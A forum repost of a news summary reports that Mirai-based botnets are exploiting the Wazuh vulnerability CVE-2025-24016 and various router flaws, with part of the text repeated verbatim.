06-10-2025, 01:16 PM
Threat actors are actively exploiting CVE-2025-24016, a critical remote code execution vulnerability in Wazuh servers, to deploy two distinct Mirai-based botnets for distributed denial-of-service (DDoS) attacks. Akamai first identified the malicious activity in late March 2025, shortly after the public disclosure of the vulnerability and a proof-of-concept (PoC) exploit. The flaw, affecting versions 4.4.0 and later, was patched in February 2025 with version 4.9.1, but attackers continue to exploit unpatched systems.
The first botnet delivers the LZRD Mirai variant, previously observed targeting IoT devices. Infrastructure analysis uncovered additional Mirai variants, including "neon" and "vision," along with exploits targeting Hadoop YARN and various router vulnerabilities.
The second botnet deploys the Resbot variant and appears to have connections to Italian-language domains, suggesting a campaign possibly targeting Italian-speaking users. It leverages multiple exploits against Huawei, Realtek, and ZyXEL routers.
Researchers note that Mirai propagation remains persistent, with attackers frequently repurposing older exploits and incorporating newly disclosed vulnerabilities, including CVE-2024-3721.
Globally, botnet activity continues to rise, especially in the APAC region and among IoT devices, contributing to an increase in sophisticated cyberattacks. Additionally, the FBI has warned about the BADBOX 2.0 botnet, which has infected millions of devices to create proxy networks for cybercriminals.
Source: https://thehackernews.com/2025/06/botnet...ility.html
The first botnet delivers the LZRD Mirai variant, previously observed targeting IoT devices. Infrastructure analysis uncovered additional Mirai variants, including "neon" and "vision," along with exploits targeting Hadoop YARN and various router vulnerabilities.
The second botnet deploys the Resbot variant and appears to have connections to Italian-language domains, suggesting a campaign possibly targeting Italian-speaking users. It leverages multiple exploits against Huawei, Realtek, and ZyXEL routers.
Researchers note that Mirai propagation remains persistent, with attackers frequently repurposing older exploits and incorporating newly disclosed vulnerabilities, including CVE-2024-3721.
Globally, botnet activity continues to rise, especially in the APAC region and among IoT devices, contributing to an increase in sophisticated cyberattacks. Additionally, the FBI has warned about the BADBOX 2.0 botnet, which has infected millions of devices to create proxy networks for cybercriminals.
Source: https://thehackernews.com/2025/06/botnet...ility.html